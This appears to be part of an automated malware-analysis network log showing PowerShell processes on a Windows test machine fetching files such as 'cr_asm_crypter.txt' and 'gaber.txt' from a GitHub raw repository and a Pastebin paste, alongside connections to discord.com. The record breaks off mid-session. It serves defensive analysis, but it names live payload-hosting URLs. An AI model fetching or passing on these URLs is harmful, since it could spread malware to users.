                                                                                        Oct 15, 2024 15:54:09.617268085 CEST8049711185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:09.618653059 CEST4971180192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:09.861903906 CEST4971180192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:09.866924047 CEST8049711185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:09.936141014 CEST49712443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:09.936187983 CEST44349712185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:09.936359882 CEST49712443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:09.947333097 CEST49712443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:09.947349072 CEST44349712185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:10.565216064 CEST44349712185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:10.565315962 CEST49712443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:10.569961071 CEST49712443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:10.569968939 CEST44349712185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:10.570239067 CEST44349712185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:10.578193903 CEST49712443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:10.619401932 CEST44349712185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:10.810374022 CEST44349712185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:10.810419083 CEST44349712185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:10.810440063 CEST44349712185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:10.810463905 CEST44349712185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:10.810494900 CEST49712443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:10.810511112 CEST44349712185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:10.810523033 CEST49712443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:10.810699940 CEST44349712185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:10.810736895 CEST49712443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:10.810751915 CEST44349712185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:10.818442106 CEST44349712185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:10.818499088 CEST49712443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:10.912328005 CEST49712443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:29.661647081 CEST55611443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:29.661688089 CEST44355611162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:29.661990881 CEST55611443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:29.662384987 CEST55611443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:29.662401915 CEST44355611162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:30.234739065 CEST5561380192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:30.239660025 CEST8055613104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:30.239734888 CEST5561380192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:30.242310047 CEST5561380192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:30.247143030 CEST8055613104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:30.286418915 CEST44355611162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:30.286501884 CEST55611443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:30.288907051 CEST55611443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:30.288913012 CEST44355611162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:30.289164066 CEST44355611162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:30.296406031 CEST55611443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:30.339406967 CEST44355611162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:30.339469910 CEST55611443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:30.339482069 CEST44355611162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:30.522788048 CEST44355611162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:30.522859097 CEST44355611162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:30.522911072 CEST55611443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:30.531781912 CEST55611443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:30.858222961 CEST8055613104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:30.861242056 CEST55614443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:30.861287117 CEST44355614104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:30.861409903 CEST55614443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:30.864432096 CEST55614443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:30.864454985 CEST44355614104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:30.907675028 CEST5561380192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:31.468970060 CEST44355614104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:31.469233990 CEST55614443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:31.471301079 CEST55614443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:31.471313000 CEST44355614104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:31.471594095 CEST44355614104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:31.481828928 CEST55614443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:31.527405024 CEST44355614104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:31.623400927 CEST44355614104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:31.623495102 CEST44355614104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:31.623667002 CEST55614443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:31.634654045 CEST55614443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:31.678729057 CEST5561680192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:31.683907032 CEST8055616185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:31.684020042 CEST5561680192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:31.684456110 CEST5561680192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:31.689291000 CEST8055616185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:32.330882072 CEST8055616185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:32.330966949 CEST8055616185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:32.330976009 CEST8055616185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:32.331024885 CEST5561680192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:32.331104994 CEST5561680192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:32.331944942 CEST55617443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:32.331984997 CEST44355617185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:32.332045078 CEST55617443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:32.332544088 CEST55617443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:32.332560062 CEST44355617185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:32.336019993 CEST8055616185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:32.946047068 CEST44355617185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:32.946157932 CEST55617443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:32.948363066 CEST55617443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:32.948369980 CEST44355617185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:32.948601961 CEST44355617185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:32.949610949 CEST55617443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:32.995394945 CEST44355617185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:33.083158016 CEST44355617185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:33.083236933 CEST44355617185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:33.083266020 CEST44355617185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:33.083278894 CEST55617443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:33.083290100 CEST44355617185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:33.083317995 CEST44355617185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:33.083332062 CEST55617443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:33.083337069 CEST44355617185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:33.083379030 CEST55617443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:33.083394051 CEST44355617185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:33.088042974 CEST44355617185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:33.088095903 CEST55617443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:33.109529972 CEST55617443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:37.843954086 CEST5561980192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:37.848958015 CEST8055619104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:37.849139929 CEST5561980192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:37.850070000 CEST5561980192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:37.854918957 CEST8055619104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:38.476238012 CEST8055619104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:38.478346109 CEST55620443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:38.478367090 CEST44355620104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:38.478434086 CEST55620443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:38.481247902 CEST55620443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:38.481266975 CEST44355620104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:38.517102957 CEST5561980192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:39.088493109 CEST44355620104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.088567972 CEST55620443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:39.090259075 CEST55620443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:39.090267897 CEST44355620104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.090500116 CEST44355620104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.096527100 CEST55620443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:39.139403105 CEST44355620104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.238169909 CEST44355620104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.238245010 CEST44355620104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.238404036 CEST55620443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:39.256236076 CEST55620443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:39.268138885 CEST5562180192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:39.273143053 CEST8055621185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.273231983 CEST5562180192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:39.273380995 CEST5562180192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:39.278300047 CEST8055621185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.866935015 CEST8055621185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.867567062 CEST8055621185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.867767096 CEST5562180192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:39.867799044 CEST5562180192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:39.868761063 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:39.868814945 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.869081020 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:39.869508982 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:39.869518995 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.872801065 CEST8055621185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.488370895 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.488461971 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:40.490360022 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:40.490366936 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.490695000 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.491724968 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:40.539400101 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.618683100 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.618812084 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.618861914 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.618864059 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:40.618881941 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.618935108 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.618947029 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:40.618952036 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.618999958 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:40.619316101 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.627470970 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.627543926 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:40.652196884 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:45.517879963 CEST55624443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:45.517936945 CEST44355624162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:45.518009901 CEST55624443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:45.518357992 CEST55624443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:45.518376112 CEST44355624162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:46.155016899 CEST44355624162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:46.155379057 CEST55624443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:46.156440973 CEST55624443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:46.156450033 CEST44355624162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:46.156697035 CEST44355624162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:46.159231901 CEST55624443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:46.203406096 CEST44355624162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:46.203938961 CEST55624443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:46.203944921 CEST44355624162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:46.501034021 CEST44355624162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:46.501163006 CEST44355624162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:46.501321077 CEST55624443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:46.522712946 CEST55624443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:51.557235956 CEST5561380192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:52.971724033 CEST55625443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:52.971780062 CEST44355625162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:52.971854925 CEST55625443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:52.972305059 CEST55625443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:52.972313881 CEST44355625162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:53.582803011 CEST44355625162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:53.582894087 CEST55625443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:53.584183931 CEST55625443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:53.584192991 CEST44355625162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:53.584428072 CEST44355625162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:53.585267067 CEST55625443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:53.627446890 CEST44355625162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:53.627948046 CEST55625443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:53.627969980 CEST44355625162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:53.884762049 CEST44355625162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:53.884912968 CEST44355625162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:53.885122061 CEST55625443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:53.891022921 CEST55625443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:58.933748960 CEST5561980192.168.2.12104.20.4.235
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 15, 2024 15:54:08.983006954 CEST5281453192.168.2.121.1.1.1
                                                                                        Oct 15, 2024 15:54:08.990437984 CEST53528141.1.1.1192.168.2.12
                                                                                        Oct 15, 2024 15:54:26.102683067 CEST53641071.1.1.1192.168.2.12
                                                                                        Oct 15, 2024 15:54:27.807394981 CEST53654901.1.1.1192.168.2.12
                                                                                        Oct 15, 2024 15:54:29.652574062 CEST5026253192.168.2.121.1.1.1
                                                                                        Oct 15, 2024 15:54:29.660701036 CEST53502621.1.1.1192.168.2.12
                                                                                        Oct 15, 2024 15:54:30.219273090 CEST6205853192.168.2.121.1.1.1
                                                                                        Oct 15, 2024 15:54:30.226171970 CEST53620581.1.1.1192.168.2.12
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Oct 15, 2024 15:54:08.983006954 CEST192.168.2.121.1.1.10xa786Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                        Oct 15, 2024 15:54:29.652574062 CEST192.168.2.121.1.1.10x84dfStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                        Oct 15, 2024 15:54:30.219273090 CEST192.168.2.121.1.1.10x9b3aStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Oct 15, 2024 15:54:08.990437984 CEST1.1.1.1192.168.2.120xa786No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                        Oct 15, 2024 15:54:08.990437984 CEST1.1.1.1192.168.2.120xa786No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                        Oct 15, 2024 15:54:08.990437984 CEST1.1.1.1192.168.2.120xa786No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                        Oct 15, 2024 15:54:08.990437984 CEST1.1.1.1192.168.2.120xa786No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                        Oct 15, 2024 15:54:29.660701036 CEST1.1.1.1192.168.2.120x84dfNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                        Oct 15, 2024 15:54:29.660701036 CEST1.1.1.1192.168.2.120x84dfNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                        Oct 15, 2024 15:54:29.660701036 CEST1.1.1.1192.168.2.120x84dfNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                        Oct 15, 2024 15:54:29.660701036 CEST1.1.1.1192.168.2.120x84dfNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                        Oct 15, 2024 15:54:29.660701036 CEST1.1.1.1192.168.2.120x84dfNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                        Oct 15, 2024 15:54:30.226171970 CEST1.1.1.1192.168.2.120x9b3aNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                        Oct 15, 2024 15:54:30.226171970 CEST1.1.1.1192.168.2.120x9b3aNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                        Oct 15, 2024 15:54:30.226171970 CEST1.1.1.1192.168.2.120x9b3aNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                        • raw.githubusercontent.com
                                                                                        • discord.com
                                                                                        • pastebin.com
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.1249711185.199.109.133807056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 15, 2024 15:54:09.024914026 CEST242OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Host: raw.githubusercontent.com
                                                                                        Connection: Keep-Alive
                                                                                        Oct 15, 2024 15:54:09.616374969 CEST561INHTTP/1.1 301 Moved Permanently
                                                                                        Connection: close
                                                                                        Content-Length: 0
                                                                                        Server: Varnish
                                                                                        Retry-After: 0
                                                                                        Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Tue, 15 Oct 2024 13:54:09 GMT
                                                                                        Via: 1.1 varnish
                                                                                        X-Served-By: cache-dfw-kdal2120035-DFW
                                                                                        X-Cache: HIT
                                                                                        X-Cache-Hits: 0
                                                                                        X-Timer: S1729000450.551140,VS0,VE0
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Expires: Tue, 15 Oct 2024 13:59:09 GMT
                                                                                        Vary: Authorization,Accept-Encoding


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.1255613104.20.4.235806988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 15, 2024 15:54:30.242310047 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Host: pastebin.com
                                                                                        Connection: Keep-Alive
                                                                                        Oct 15, 2024 15:54:30.858222961 CEST472INHTTP/1.1 301 Moved Permanently
                                                                                        Date: Tue, 15 Oct 2024 13:54:30 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 167
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: max-age=3600
                                                                                        Expires: Tue, 15 Oct 2024 14:54:30 GMT
                                                                                        Location: https://pastebin.com/raw/sA04Mwk2
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d304d2e5a2a2e27-DFW
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.1255616185.199.109.133806988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 15, 2024 15:54:31.684456110 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Host: raw.githubusercontent.com
                                                                                        Connection: Keep-Alive
                                                                                        Oct 15, 2024 15:54:32.330882072 CEST541INHTTP/1.1 301 Moved Permanently
                                                                                        Connection: close
                                                                                        Content-Length: 0
                                                                                        Server: Varnish
                                                                                        Retry-After: 0
                                                                                        Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Tue, 15 Oct 2024 13:54:32 GMT
                                                                                        Via: 1.1 varnish
                                                                                        X-Served-By: cache-dfw-kdfw8210140-DFW
                                                                                        X-Cache: HIT
                                                                                        X-Cache-Hits: 0
                                                                                        X-Timer: S1729000472.214849,VS0,VE0
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Expires: Tue, 15 Oct 2024 13:59:32 GMT
                                                                                        Vary: Authorization,Accept-Encoding


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.1255619104.20.4.235802132C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 15, 2024 15:54:37.850070000 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Host: pastebin.com
                                                                                        Connection: Keep-Alive
                                                                                        Oct 15, 2024 15:54:38.476238012 CEST472INHTTP/1.1 301 Moved Permanently
                                                                                        Date: Tue, 15 Oct 2024 13:54:38 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 167
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: max-age=3600
                                                                                        Expires: Tue, 15 Oct 2024 14:54:38 GMT
                                                                                        Location: https://pastebin.com/raw/sA04Mwk2
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d304d5dfadee936-DFW
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.1255621185.199.109.133802132C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 15, 2024 15:54:39.273380995 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
